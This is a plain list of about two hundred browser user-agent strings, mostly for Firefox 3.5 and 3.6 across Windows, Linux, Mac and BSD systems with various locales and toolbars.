Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.8) Gecko/20100727 Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.9.2.8) Gecko/20100725 Gentoo Firefox/3.6.8
Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.8) Gecko/20100722 AskTbADAP/3.9.1.14019 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.8) Gecko/20100722 Firefox 3.6.8 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0C)
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.8) Gecko/20100722 Firefox 3.6.8
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.3) Gecko/20121221 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-TW; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7
Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.7 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-PT; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729; .NET4.0E)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.4) Gecko/20100614 Ubuntu/10.04 (lucid) Firefox/3.6.4
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.4) Gecko/20100625 Gentoo Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-CA; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.0 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.4) Gecko/20100503 Firefox/3.6.4 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3pre) Gecko/20100405 Firefox/3.6.3plugin1 ( .NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.3) Gecko/20100403 Fedora/3.6.3-4.fc13 Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100403 Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100404 Ubuntu/10.04 (lucid) Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Mozilla/5.0 (X11; U; Linux AMD64; en-US; rv:1.9.2.3) Gecko/20100403 Ubuntu/10.10 (maverick) Firefox/3.6.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; ca; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB7.0
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.2) Gecko/20100316 AskTbSPC2/3.9.1.14019 Firefox/3.6.2
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.0.04506.648)
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.0.04506.30)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10pre) Gecko/20100902 Ubuntu/9.10 (karmic) Firefox/3.6.1pre
Mozilla/5.0 (X11; U; Linux x86_64; ja-JP; rv:1.9.2.16) Gecko/20110323 Ubuntu/10.10 (maverick) Firefox/3.6.16
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.16) Gecko/20110323 Ubuntu/9.10 (karmic) Firefox/3.6.16 FirePHP/0.5
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 ( .NET CLR 3.5.30729; .NET4.0E)
Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.1.13) Gecko/20100914 Firefox/3.6.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.16) Gecko/20110319 AskTbUTR/3.11.3.15590 Firefox/3.6.16
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.16pre) Gecko/20110304 Ubuntu/10.10 (maverick) Firefox/3.6.15pre
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.15) Gecko/20110303 Ubuntu/10.04 (lucid) Firefox/3.6.15 FirePHP/0.5
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.15) Gecko/20110330 CentOS/3.6-1.el5.centos Firefox/3.6.15
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 ( .NET CLR 3.5.30729; .NET4.0C) FirePHP/0.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.15) Gecko/20110303 AskTbBT4/3.11.3.15590 Firefox/3.6.15 ( .NET CLR 3.5.30729; .NET4.0C)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.14pre) Gecko/20110105 Firefox/3.6.14pre
Mozilla/5.0 (X11; U; Linux armv7l; en-US; rv:1.9.2.14) Gecko/20110224 Firefox/3.6.14 MB860/Version.0.43.3.MB860.AmericaMovil.en.MX
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-AU; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 GTB7.1 ( .NET CLR 3.5.30729)
Mozilla/5.0 Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.13) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; nb-NO; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101223 Gentoo Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101219 Gentoo Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Red Hat/3.6-3.el4 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-NZ; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.2.13) Gecko/20101206 Ubuntu/9.10 (karmic) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.2.13) Gecko/20101206 Red Hat/3.6-2.el5 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux x86_64; da-DK; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux MIPS32 1074Kf CPS QuadCore; en-US; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.13) Gecko/20101206 Ubuntu/9.10 (karmic) Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.13) Gecko/20101209 CentOS/3.6-2.el5.centos Firefox/3.6.13
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.9.2.12) Gecko/20101030 Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux x86_64; es-MX; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc13 Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.12) Gecko/20101026 SUSE/3.6.12-0.7.1 Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101102 Gentoo Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101102 Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux ppc; fr; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12 GTB7.1
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc13 Firefox/3.6.12
Mozilla/5.0 (X11; FreeBSD x86_64; rv:2.0) Gecko/20100101 Firefox/3.6.12
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)
Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 (.NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET CLR 3.5.21022)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 GTB5
Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.2.11) Gecko/20101028 CentOS/3.6-2.el5.centos Firefox/3.6.11
Mozilla/5.0 (X11; U; Linux armv7l; en-GB; rv:1.9.2.3pre) Gecko/20100723 Firefox/3.6.11
Mozilla/5.0 (Windows; U; Windows NT 5.2; ru; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11
Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 ( .NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1
Mozilla/5.0 (X11; U; Linux x86_64; el-GR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1
Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.04 (jaunty) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.11) Gecko/20101013 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.10 (karmic) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100914 SUSE/3.6.10-0.3.1 Firefox/3.6.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; ro; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.1) Gecko/20100122 firefox/3.6.1
Mozilla/5.0(Windows; U; Windows NT 7.0; rv:1.9.2) Gecko/20100101 Firefox/3.6
Mozilla/5.0(Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100222 Ubuntu/10.04 (lucid) Firefox/3.6
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100130 Gentoo Firefox/3.6
Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2) Gecko/20100308 Ubuntu/10.04 (lucid) Firefox/3.6
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100312 Ubuntu/9.04 (jaunty) Firefox/3.6
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100128 Gentoo Firefox/3.6
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Ubuntu/10.04 (lucid) Firefox/3.6
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 FirePHP/0.4
Mozilla/5.0 (X11; Linux i686; rv:2.0) Gecko/20100101 Firefox/3.6
Mozilla/5.0 (X11; FreeBSD i686) Firefox/3.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU; rv:1.9.2) Gecko/20100105 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; lt; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.3a3pre) Gecko/20100306 Firefox3.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100806 Firefox/3.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6;MEGAUPLOAD 1.0
Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.2) Gecko/20100105 Firefox/3.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.2) Gecko/20100115 Firefox/3.6 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b5pre) Gecko/20090517 Firefox/3.5b4pre (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090409 Firefox/3.5b4pre
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090401 Firefox/3.5b4pre
Mozilla/5.0 (X11; U; Linux i686; nl-NL; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5
Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.9) Gecko/20100402 Ubuntu/9.10 (karmic) Firefox/3.5.9 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-2.fc12 Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 GTB7.0
Mozilla/5.0 (X11; U; Linux x86_64; es-CL; rv:1.9.1.9) Gecko/20100402 Ubuntu/9.10 (karmic) Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-1.fc12 Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1 Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9 GTB7.1
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100315 Ubuntu/9.10 (karmic) Firefox/3.5.9
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.4) Gecko/20091028 Ubuntu/9.10 (karmic) Firefox/3.5.9
Mozilla/5.0 (Windows; U; Windows NT 6.1; tr; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.1
